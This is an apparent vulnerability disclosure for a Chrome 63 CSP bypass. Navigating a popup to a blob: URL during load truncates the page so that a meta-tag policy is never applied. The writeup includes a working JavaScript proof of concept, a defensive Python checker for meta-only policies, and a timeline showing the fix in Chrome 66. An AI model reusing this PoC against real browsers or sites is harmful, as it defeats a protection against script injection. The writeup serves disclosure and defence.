Chrome 63.0 CSP Bypass/Page Truncation by navigating to Blob during load

0x01 TL;DR

I observed that when a try/catch inside a timer uses location to set a blob: scheme URL, the loading of network requests is randomly interrupted: the page finishes loading but part of its content is missing, and interestingly the content goes missing in top-to-bottom order. This flaw made me think it could be used to preferentially "eat" the CSP defence declared in the head, so that the declared policy becomes completely ineffective and injected content executes normally.

For example:

<cut>

content...

<meta http-equiv="Content-Security-Policy" content="script-src 'self'; object-src 'none'; style-src cdn.example.org third-party.org; child-src https:">

</cut>

content...

injection here

Truncating Google or Bing:

https://i.loli.net/2017/11/09/5a040d0918a19.jpg

https://i.loli.net/2017/11/09/5a040d38ba95e.jpg
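The truncation only defeats the policy because it lives in a <meta> tag inside the document; a Content-Security-Policy HTTP response header is applied before any body bytes are parsed. The Python below is an added example, not part of the original writeup: it classifies how a response delivers its CSP and shows that a meta-declared policy disappears once the body is cut off before the tag is complete. The sample body and headers are constructed for illustration.

```python
from html.parser import HTMLParser

# Constructed sample document, modelled on the meta-tag CSP shown above.
SAMPLE_BODY = (
    "<html><head><title>t</title>\n"
    "<meta http-equiv=\"Content-Security-Policy\" "
    "content=\"script-src 'self'; object-src 'none'\">\n"
    "</head><body>content...</body></html>"
)


class _MetaCSP(HTMLParser):
    """Collects the content of every <meta http-equiv="Content-Security-Policy">."""

    def __init__(self):
        super().__init__()
        self.policies = []

    def handle_starttag(self, tag, attrs):
        if tag != "meta":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        if a.get("http-equiv", "").lower() == "content-security-policy":
            self.policies.append(a.get("content", ""))


def meta_policies(body):
    """Policies the parser actually sees; an unterminated tag in a truncated body is never reported."""
    p = _MetaCSP()
    p.feed(body)
    return p.policies


def classify_csp(headers, body):
    """'header' if the policy arrives as an HTTP header (independent of body bytes),
    'meta-only' if it exists only inside the document, otherwise 'none'."""
    if any(k.lower() == "content-security-policy" for k in headers):
        return "header"
    return "meta-only" if meta_policies(body) else "none"


def meta_csp_survives(body, received_bytes):
    """Whether a meta-declared policy is still parsed when only the first
    received_bytes of the body arrive (the top-to-bottom loss described above)."""
    return bool(meta_policies(body[:received_bytes]))
```

Responses classified as "meta-only" are the ones exposed to this class of bug; moving the policy into the response header removes the dependency on the body arriving intact.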

0x02 PoC

<html>
    <!-- author: evi1m0.bat[at]gmail.com -->
    <script>
        pwn = () => {
            target = 'http://server.n0tr00t.com/chrome/csptest.php?p=' + Date();
            win = window.open(target, "emm", "width=500,height=400");

            setInterval(`try{
                    x = win.location.href;
                } catch(e) {
                    win.location.href = 'blob://';
                }`, 1);
        }
    </script>

    <p>
      <a onclick="pwn()" target="_blank">Click me bypass CSP</a>
      <!-- If it doesn't work, try again. :) -->
    </p>
</html>

0x03 Video

0x04 Track

  • Nov 9 2017: Reported by evi1m0.bat@gmail.com
  • May 7 2018: Fixed in Chrome 66.0.3359.139
  • https://bugs.chromium.org/p/chromium/issues/detail?id=783073#c_ts1525680141